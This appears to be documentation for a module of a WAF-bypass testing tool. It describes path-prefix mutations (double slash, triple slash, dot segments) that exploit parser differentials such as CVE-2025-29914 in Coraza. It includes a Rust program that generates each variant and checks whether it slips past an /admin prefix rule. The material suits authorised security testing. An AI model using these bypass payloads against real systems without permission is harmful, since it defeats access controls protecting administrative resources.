Module path_prefix

Path-prefix mutations — restructure the URI path so the WAF’s prefix-match ACL sees a different shape than the origin parser eventually serves.

§Why this is a distinct module from crate::url_mutate

url_mutate operates on path SEGMENT bytes and on QUERY VALUE bytes. The mutations here operate on path STRUCTURE — they change how the path is delimited, not what’s inside it. Lumping them into UrlStrategy would force a value-byte mutator and a path-shape mutator into one enum and produce category errors at the call sites that build attack pipelines.

§What’s here

§PathPrefixStrategy::DoubleSlash — CVE-2025-29914 (Coraza WAF < 3.3.3)

Coraza historically parsed the request target with url.Parse from Go’s net/url package, which treats a string that begins with // as a scheme-relative URL: //admin parses as Host = "admin", Path = "" (and //admin/users as Host = "admin", Path = "/users"). A Coraza rule of the form SecRule REQUEST_URI "@beginsWith /admin" therefore does not fire, because REQUEST_URI was populated from the parsed Path field, which no longer starts with /admin. The HTTP origin behind Coraza (nginx, Caddy, Envoy) re-parses the raw request line, merges //admin back to /admin, and serves the protected resource. Rated CVSS 5.4; fixed in Coraza 3.3.3. Any unpatched deployment whose ACL relies on a prefix match against REQUEST_URI is bypassed by a one-character path edit.

Citation: https://dev.to/cverports/cve-2025-29914-the-double-slash-deception-bypassing-coraza-waf-with-rfc-compliance-2l75

§PathPrefixStrategy::TripleSlash

Stretches DoubleSlash further. Some normalisers collapse a run of slashes only in a later pass (for example after the first percent-decode), so a WAF that matches the raw request line before any decoding and an origin that decodes and normalises once see different forms. Useful when a WAF special-cases // (or collapses it before matching) but leaves /// untouched.

§PathPrefixStrategy::SlashDot / SlashDotSlash

/./admin and /.//admin. RFC 3986 §5.2.4 (remove_dot_segments) resolves /./admin to /admin; the same algorithm turns /.//admin into //admin, which reaches /admin only on origins that also merge repeated slashes (nginx merge_slashes, Apache’s default). WAFs that match the raw REQUEST_URI literal miss both forms; origins that apply RFC normalisation (Apache, IIS, most reverse proxies) serve the protected path.
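The parser differential described in the three sections above, as an added example that is not the crate’s own code: a from-scratch Rust model with a mutator over the four variants, a WAF-side view that reproduces the net/url.Parse behaviour described for DoubleSlash, and an origin-side normaliser that merges slashes and runs remove_dot_segments, then a probe that reports which variant slips past the ACL while the origin still routes it under the protected prefix. The enum and function names mirror the module listing, but the bodies, the technique labels, the treatment of /// as just another scheme-relative prefix on the WAF side (a simplifying assumption; real parsers differ on ///, which is what the TripleSlash variant probes), and the sample target /admin/users?id=1 with protected prefix /admin are all assumptions made for this example.

```rust
// Added illustration, not the crate's implementation: a self-contained model of
// the WAF/origin parser differential behind the path_prefix module. Names mirror
// the module listing; bodies, labels and sample inputs are assumptions.

/// The four path-shape mutations described in the module docs.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum PathPrefixStrategy {
    DoubleSlash,
    TripleSlash,
    SlashDot,
    SlashDotSlash,
}

impl PathPrefixStrategy {
    pub const ALL: [PathPrefixStrategy; 4] = [
        PathPrefixStrategy::DoubleSlash,
        PathPrefixStrategy::TripleSlash,
        PathPrefixStrategy::SlashDot,
        PathPrefixStrategy::SlashDotSlash,
    ];

    /// Technique label reported with the mutated request (label names assumed).
    pub fn label(self) -> &'static str {
        match self {
            PathPrefixStrategy::DoubleSlash => "path_prefix.double_slash",
            PathPrefixStrategy::TripleSlash => "path_prefix.triple_slash",
            PathPrefixStrategy::SlashDot => "path_prefix.slash_dot",
            PathPrefixStrategy::SlashDotSlash => "path_prefix.slash_dot_slash",
        }
    }
}

/// Restructure the leading delimiter of a path-and-query string. The query and
/// every path segment byte are carried through untouched; only the shape changes.
pub fn mutate_path_prefix(path_and_query: &str, strategy: PathPrefixStrategy) -> (String, &'static str) {
    let (path, query) = match path_and_query.split_once('?') {
        Some((p, q)) => (p, Some(q)),
        None => (path_and_query, None),
    };
    let rest = path.strip_prefix('/').unwrap_or(path);
    let prefix = match strategy {
        PathPrefixStrategy::DoubleSlash => "//",
        PathPrefixStrategy::TripleSlash => "///",
        PathPrefixStrategy::SlashDot => "/./",
        PathPrefixStrategy::SlashDotSlash => "/.//",
    };
    let mut out = format!("{prefix}{rest}");
    if let Some(q) = query {
        out.push('?');
        out.push_str(q);
    }
    (out, strategy.label())
}

/// WAF side: model of the net/url.Parse behaviour described for DoubleSlash. A
/// target beginning with "//" is read as scheme-relative: bytes up to the next
/// '/' become Host, the remainder becomes Path, and Path is what fills
/// REQUEST_URI. Treating "///" the same way is this model's assumption.
pub fn waf_request_uri(raw_target: &str) -> String {
    let path = raw_target.split('?').next().unwrap_or("");
    if let Some(after) = path.strip_prefix("//") {
        match after.find('/') {
            Some(i) => after[i..].to_string(), // Host = after[..i]
            None => String::new(),             // Host = after, Path = ""
        }
    } else {
        path.to_string()
    }
}

/// Origin side: merge repeated slashes (nginx merge_slashes, Apache's default)
/// and apply RFC 3986 section 5.2.4 remove_dot_segments before routing.
pub fn origin_normalise(raw_target: &str) -> String {
    let path = raw_target.split('?').next().unwrap_or("");
    let mut segments: Vec<&str> = Vec::new();
    for seg in path.split('/') {
        match seg {
            "" | "." => {}                    // empty (merged slash) or "." segment
            ".." => { segments.pop(); }       // step up, never above root
            s => segments.push(s),
        }
    }
    let mut out = format!("/{}", segments.join("/"));
    let dir_like = path.ends_with('/') || path.ends_with("/.") || path.ends_with("/..");
    if dir_like && !out.ends_with('/') {
        out.push('/');
    }
    out
}

/// The differential: the prefix ACL misses the request, the origin still serves it.
pub fn bypasses(raw_target: &str, protected_prefix: &str) -> bool {
    !waf_request_uri(raw_target).starts_with(protected_prefix)
        && origin_normalise(raw_target).starts_with(protected_prefix)
}

/// Probe every variant against one target, as the strategy engine would.
pub fn probe(path_and_query: &str, protected_prefix: &str) -> Vec<(&'static str, String, bool)> {
    PathPrefixStrategy::ALL
        .iter()
        .map(|&s| {
            let (mutated, label) = mutate_path_prefix(path_and_query, s);
            let hit = bypasses(&mutated, protected_prefix);
            (label, mutated, hit)
        })
        .collect()
}

fn main() {
    // Constructed sample target; "/admin" is the hypothetical protected prefix.
    for (label, mutated, hit) in probe("/admin/users?id=1", "/admin") {
        println!("{label:<28} {mutated:<24} bypass={hit}");
    }
}
```

Under this model DoubleSlash, SlashDot and SlashDotSlash all bypass the /admin ACL while TripleSlash does not, because the modelled WAF reads ///admin/users as an empty authority followed by Path = /admin/users. That is the point of probing each variant rather than assuming one: which shapes split the two parsers depends on the exact parser pair, so swap waf_request_uri and origin_normalise for models of the real pair in front of an authorised target before trusting a result.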

§Reachability

Exposed through mutate_url_with_prefix(). The strategy engine drives this via a new Technique::PathPrefix(...) arm; the parser-diff path family probes each variant in turn against the authorised target.

Pass 21 R62 — frontier technique #4 per the 2025 research scan.

Enums§

PathPrefixStrategy

Functions§

mutate_path_prefix
Apply a path-prefix mutation to a path-and-query string. Returns the mutated form and the technique label.